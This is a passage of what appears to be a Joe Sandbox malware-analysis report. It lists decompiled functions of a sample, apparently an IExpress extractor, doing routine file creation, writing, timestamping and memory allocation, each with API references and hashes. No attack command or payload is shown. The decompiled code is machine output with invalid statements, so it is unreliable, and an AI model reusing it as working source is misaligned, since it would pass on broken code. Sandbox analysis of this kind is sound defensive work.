                                                                                                                                                                                                        					_t30 = E000C4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L3;
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 000C4DB5
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 000C4DDD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFileItemText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                        • API String ID: 3625706803-3647970563
                                                                                                                                                                                                        • Opcode ID: 246a6f7ae976e748805e3be07a6a709795960443d149dfc8980d234ca2562fcd
                                                                                                                                                                                                        • Instruction ID: 5353f01d634d4017fa0c724d5ea54257380a604b845f0b1224f125af97a396fb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 246a6f7ae976e748805e3be07a6a709795960443d149dfc8980d234ca2562fcd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F441F3366041059ACB65AF28D9A8FFE73E5FB45300F14466CE88397296DB31DE4AC750
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                        				struct _FILETIME _v12;
                                                                                                                                                                                                        				struct _FILETIME _v20;
                                                                                                                                                                                                        				FILETIME* _t14;
                                                                                                                                                                                                        				int _t15;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t21 = __ecx * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t21 + 0xc8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t14 =  &_v12;
                                                                                                                                                                                                        					_t15 = SetFileTime( *(_t21 + 0xc8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DosDateTimeToFileTime.KERNEL32 ref: 000C4C54
                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000C4C66
                                                                                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 000C4C7E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$DateLocal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2071732420-0
                                                                                                                                                                                                        • Opcode ID: 29091d95e29611166825c493226ede7adc4e9214c0fe358d6f84c8656a8f58ab
                                                                                                                                                                                                        • Instruction ID: 43df8c0840b1627566a39605ecfc43b61660c1217970b14747e48d5ea97cbe8e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29091d95e29611166825c493226ede7adc4e9214c0fe358d6f84c8656a8f58ab
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59F09672A0110C6F9BA4DFB5CC98EFF77ECFB05345744452EA816C10A0EA34D914C760
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E000C487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				CHAR* _t11;
                                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t11 = __ecx;
                                                                                                                                                                                                        				asm("sbb edi, edi");
                                                                                                                                                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                        				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                        					asm("sbb esi, esi");
                                                                                                                                                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                        						asm("sbb esi, esi");
                                                                                                                                                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t23 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                        					return _t7;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E000C490C(_t11);
                                                                                                                                                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,000C4A23,?,000C4F67,*MEMCAB,00008000,00000180), ref: 000C48DE
                                                                                                                                                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,000C4F67,*MEMCAB,00008000,00000180), ref: 000C4902
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: 24b3bb3f2bcd20f5195ca59b7645f91b74486ea8f627fc186f3edbeacde86478
                                                                                                                                                                                                        • Instruction ID: c7ea0389b88c5a3e78a0208e3a6a1c23efd209fa8db7e7310a5b0ee168a6a016
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24b3bb3f2bcd20f5195ca59b7645f91b74486ea8f627fc186f3edbeacde86478
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3014BA3E1157426F36442294C98FBF555CEB9A734F1B0339BDAAE71D2D9644C0481E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E000C4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				struct HWND__* _t21;
                                                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 =  *0xc858c; // 0x268
                                                                                                                                                                                                        				_t9 = E000C3680(_t20);
                                                                                                                                                                                                        				if( *0xc91d8 == 0) {
                                                                                                                                                                                                        					_push(_t24);
                                                                                                                                                                                                        					_t12 = WriteFile( *(0xc8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t25 = _a12;
                                                                                                                                                                                                        						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        							_t14 =  *0xc9400; // 0xf8800
                                                                                                                                                                                                        							_t15 = _t14 + _t25;
                                                                                                                                                                                                        							 *0xc9400 = _t15;
                                                                                                                                                                                                        							if( *0xc8184 != 0) {
                                                                                                                                                                                                        								_t21 =  *0xc8584; // 0x0
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xc93f8, 0);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return _t9 | 0xffffffff;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 000C369F
                                                                                                                                                                                                          • Part of subcall function 000C3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000C36B2
                                                                                                                                                                                                          • Part of subcall function 000C3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000C36DA
                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 000C4B05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1084409-0
                                                                                                                                                                                                        • Opcode ID: cd7da857b59855ea56390d106ff1730eb8e99665a7d37260c6f749b626f3d2f9
                                                                                                                                                                                                        • Instruction ID: 865a8708d7ea7da65126fbbc8326f97acb88ff5df07108fcaecab34595ddf826
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd7da857b59855ea56390d106ff1730eb8e99665a7d37260c6f749b626f3d2f9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D019E31240205ABEB148F68DC29FAA7799FB44726F18C229FD39971E0CB74DC11CB80
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				intOrPtr _t4;
                                                                                                                                                                                                        				char* _t6;
                                                                                                                                                                                                        				char* _t8;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				char* _t16;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				char* _t19;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = __ecx;
                                                                                                                                                                                                        				_t10 = __edx;
                                                                                                                                                                                                        				_t17 = __ecx;
                                                                                                                                                                                                        				_t1 = _t17 + 1; // 0xc8b3f
                                                                                                                                                                                                        				_t12 = _t1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t4 =  *_t17;
                                                                                                                                                                                                        					_t17 = _t17 + 1;
                                                                                                                                                                                                        				} while (_t4 != 0);
                                                                                                                                                                                                        				_t18 = _t17 - _t12;
                                                                                                                                                                                                        				_t2 = _t18 + 1; // 0xc8b40
                                                                                                                                                                                                        				if(_t2 < __edx) {
                                                                                                                                                                                                        					_t19 = _t18 + __ecx;
                                                                                                                                                                                                        					if(_t19 > __ecx) {
                                                                                                                                                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                        						if( *_t8 != 0x5c) {
                                                                                                                                                                                                        							 *_t19 = 0x5c;
                                                                                                                                                                                                        							_t19 =  &(_t19[1]);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t6 = _a4;
                                                                                                                                                                                                        					 *_t19 = 0;
                                                                                                                                                                                                        					while( *_t6 == 0x20) {
                                                                                                                                                                                                        						_t6 = _t6 + 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return E000C16B3(_t16, _t10, _t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0x8007007a;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(000C8B3E,000C8B3F,00000001,000C8B3E,-00000003,?,000C60EC,000C1140,?), ref: 000C65BA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharPrev
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                                                                                        • Opcode ID: c1aa8a567f0634248e99cd81dca981d4e8803d428c9e698f2e636e12b3db8e35
                                                                                                                                                                                                        • Instruction ID: 8307c04528ff0fecc6f3523422abc27e73d27e3deb91f1220afdbba7445599d4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1aa8a567f0634248e99cd81dca981d4e8803d428c9e698f2e636e12b3db8e35
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16F042725086509BD331071D9884FAEBFDD9BC6350F38015EE8DAC3205CA574C4583A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E000C621E() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					0x4f0 = 2;
                                                                                                                                                                                                        					_t9 = E000C597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E000C44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					 *0xc9124 = E000C6285();
                                                                                                                                                                                                        					_t9 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E000C6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 000C623F
                                                                                                                                                                                                          • Part of subcall function 000C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000C4518
                                                                                                                                                                                                          • Part of subcall function 000C44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000C4554
                                                                                                                                                                                                          • Part of subcall function 000C6285: GetLastError.KERNEL32(000C5BBC), ref: 000C6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 381621628-0
                                                                                                                                                                                                        • Opcode ID: 2534683a917cfcf9f5d875fc547a451a1d4b3fb8f373a1fe4b70450eb876307e
                                                                                                                                                                                                        • Instruction ID: ae6dc80351f21190495afd7b61ba0f7a5502b39152ad582f12763a51d739ba85
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2534683a917cfcf9f5d875fc547a451a1d4b3fb8f373a1fe4b70450eb876307e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2F0BEB0700208ABE7A0EB748D06FFE32A8DB48300F50006EB986D6092EE7999848650
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C4B60(signed int _a4) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 = _a4 * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t15 + 0xc8d64)) != 1) {
                                                                                                                                                                                                        					_t7 = _t15 + 0xc8d74; // 0x7ec07c1f, executed
                                                                                                                                                                                                        					_t9 = FindCloseChangeNotification( *_t7); // executed
                                                                                                                                                                                                        					if(_t9 == 0) {
                                                                                                                                                                                                        						return _t9 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *((intOrPtr*)(_t15 + 0xc8d60)) = 1;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xc8d60)) = 1;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xc8d68)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xc8d70)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xc8d6c)) = 0;
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(7EC07C1F,00000000,00000000,?,000C4FA1,00000000), ref: 000C4B98
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: 877934b4fd6dd34ec957d7aaaa87bcf52267a0a38397c92dc202c14f1635e6e4
                                                                                                                                                                                                        • Instruction ID: 2a7d87a4bcd68bed591e717e5470a5324d4392012788493a343464e262b15e94
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 877934b4fd6dd34ec957d7aaaa87bcf52267a0a38397c92dc202c14f1635e6e4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ADF01271D00B089E47718F39DC00F97BBE4BBA63613148D2EA46FD21D0EB30A841DB94
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C66AE(CHAR* __ecx) {
                                                                                                                                                                                                        				unsigned int _t1;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                        				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,000C4777,?,000C4E38,?), ref: 000C66B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: 1615770e8f1ce21f96e678db8cf9e0a25ebcb1650029e0ce506c02355ff4c79a
                                                                                                                                                                                                        • Instruction ID: eaa91b99d9047f7d72ce49cdbb92d0b9c1325ec7c7aac63ed5bca26608ef92da
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1615770e8f1ce21f96e678db8cf9e0a25ebcb1650029e0ce506c02355ff4c79a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7B09276222444436A6007316C29A5A3881A7C233A7E41B94F032C01E0CA3ED846E004
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C4CA0(long _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 000C4CAA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                        • Opcode ID: d084ec1d1584168ffd37915e998c489c8056299eb12387d28b164fc6e5b2ab72
                                                                                                                                                                                                        • Instruction ID: f09539b32245a60dcb6264e97a9c6432aad04a80366e062f8b9e47249f0a5a6b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d084ec1d1584168ffd37915e998c489c8056299eb12387d28b164fc6e5b2ab72
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14B0123214420CB7DF001FC2EC09F853F1DE7C57A5F240000F60C450908A7694108696
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E000C4CC0(void* _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2979337801-0
                                                                                                                                                                                                        • Opcode ID: f9c9e116e4bf5991db491211ef77fec746b64c1d893324473af46923c6dd8d34
                                                                                                                                                                                                        • Instruction ID: a87394104dd43eef35e7b249fa4fe84a352b3a817151210d15b329ebead0e68e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9c9e116e4bf5991db491211ef77fec746b64c1d893324473af46923c6dd8d34
